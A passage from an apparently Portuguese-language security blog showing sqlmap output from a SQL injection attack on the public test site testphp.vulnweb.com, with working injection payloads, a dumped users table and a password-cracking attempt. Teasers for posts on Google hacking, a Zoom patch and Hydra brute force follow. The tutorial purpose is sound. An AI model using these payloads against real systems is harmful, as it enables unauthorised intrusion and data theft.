[*] starting at 19:16:43
[19:16:43] [INFO] resuming back-end DBMS 'mysql' 
[19:16:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 9252=9252
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: cat=1 AND (SELECT 5744 FROM(SELECT COUNT(*),CONCAT(0x7162786b71,(SELECT (ELT(5744=5744,1))),0x7176626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT CONCAT(0x7162786b71,0x4b6475656744465a615a6771444655737244686a494f66776a786776626e75777879454a77486562,0x7176626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Bnnk
---
[19:16:44] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL >= 5.0
[19:16:44] [INFO] fetching database names
available databases [2]:
[*] acuart
[*] information_schema
[19:16:44] [INFO] fetching entries of column(s) 'address, cart, cc, email, name, pass, phone, uname' for table 'users' in database 'acuart'
[19:16:44] [INFO] recognized possible password hashes in column 'cart'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] do you want to crack them via a dictionary-based attack? [Y/n/q] [19:19:59] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> [19:20:25] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] [19:20:34] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[19:20:34] [INFO] starting 4 processes 
[19:20:34] [INFO] current status: =-=-=... |
[19:20:34] [INFO] current status: ;    ... |
[19:20:34] [INFO] current status: !#%&*... /
[19:20:34] [INFO] current status: ........ -
[19:20:51] [INFO] current status: zz836... \
[19:20:51] [INFO] current status: ZzDxg... |
[19:20:51] [INFO] current status: zzl57... |
[19:20:51] [INFO] current status: zzQLx... /
[19:20:51] [INFO] current status: zzubb... -
[19:20:51] [INFO] current status: zzz1p... \
[19:20:51] [INFO] current status: zzzzz... |[19:20:52] [WARNING] no clear password(s) found
Database: acuart
Table: users
[1 entry]
+---------------------------------------------------------------------------------------------------------------+----------------------------------+--------------------------+---------------------------+-------------------+------+---------+-------+
| address                                                                                                       | cart                             | cc                       | email                     | name              | pass | phone   | uname |
+---------------------------------------------------------------------------------------------------------------+----------------------------------+--------------------------+---------------------------+-------------------+------+---------+-------+
| LAMMERS IDIOTAS KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK\r\n<script>alert("LAMMER LIXO")</script> | 7dc9c50b4891e22263bca11a0ce717bf | TUDO LAMMER USANDO HAVIJ | TUDO LAMMER USANDO SQLMAP | aaaaaaaaaaaaaaaaa | test | <blank> | test  |
+---------------------------------------------------------------------------------------------------------------+----------------------------------+--------------------------+---------------------------+-------------------+------+---------+-------+
[19:20:52] [INFO] table 'acuart.users' dumped to CSV file '/root/.sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv'
[19:20:52] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com'
[*] shutting down at 19:20:52

Como pode perceber, foi retonado algumas informações da tabela user, onde foi possível localizar o usuario e senha da aplicação.

 Com o usuario "test" e Senha "test", será possível logar na aplicação através deste link "http://testphp.vulnweb.com/login.php".

Postagens mais visitadas deste blog

google hacking comandos

O mecanismo de pesquisa do Google encontrado em www.google.com oferece muitos recursos diferentes incluindo tradução de idiomas e documentos, web, imagem, grupos de notícias, catálogo e pesquisas de notícias e muito mais. Esses recursos oferecem benefícios óbvios, mesmo para os mais internauta não iniciada, mas esses mesmos recursos permitem possibilidades muito mais nefastas  para os usuários mais maliciosos da Internet, incluindo hackers, criminosos de computador, identidade ladrões e até terroristas.  Este artigo descreve as aplicações mais nefastas do Mecanismo de pesquisa do Google, técnicas que foram coletivamente denominadas "hackers do Google ou Google Docker". Os códigos demonstrado logo abaixo tem o objetivo de mostrar tecnicas que são ultizados pelo google hacking para exploração de vulnerabilidades em determinado sistema. Qualquer técnica demonstrado aqui e que for usado contra sistema cuja não tem autorização para realizar este tipo de testes, é c
Leia mais

Zoom corrige vulnerabilidade PARA WINDOWS

Zoom corrige vulnerabilidade O Zoom anunciou ter corrigido uma nova falha de segurança que poderia permitir aos cibercriminosos criar links falsos de reuniões online, direcionando as vítimas para golpes de phishing. A vulnerabilidade permitia aos usuários corporativos gerar links personalizados para reuniões, como por exemplo “suaempresa.zoom.us”, e utilizá-los para convidar os participantes. Ela poderia ser explorada de duas maneiras, de acordo com a equipe de especialistas Em um dos cenários, os hackers tinham a possibilidade de alterar a URL personalizada, incluindo um link direto para uma conferência virtual falsa, sem que os convidados notassem a diferença. O outro envolvia o uso da interface web personalizada do Zoom, inserindo nela um link malicioso. ZOOM lança patch de correção Windows No dia 10 de julho de 2020 a EMPRESA Zoom lança uma nova versão para correção de vulnerabilidade para sistema operacional Windows Lançamento atual Data do lançamento: 10
Leia mais

Quebrar senha com hydra

THC Hydra é uma ferramenta utilizada para quebras de senhas com a versão unica e gratuita. É considerada entre uma das melhores ferramentas de quebras de senhas para comunicação em redes . Objetivo deste artigo é mostrar o funcionamento técnico desta ferramenta, quais comandos devem ser digitados para realizarem um brute force atacck. Pois dependendo do sistema a qual deseja descobrir a senha, as técnicas são totalmente diferentes. A seguir vamos citar e exemplificar os tipos de ataque realizado em cada sistemas. Também é importante ressaltar que, esta ferramenta é bem compreensível e ágil quando falamos em ataque a força bruta para descobertas de senhas. Hydra Brute force Attack Ataque de Força Bruta Brute Force Attack é conhecido pelo nome de ataque a força bruta, ou seja o ataque será realizado com base em Wordlist que contém as principais palavras chaves a qual o atacante ache que a vitima utiliza para logar em determinado sistema. É considerado um tipo de ataque
Leia mais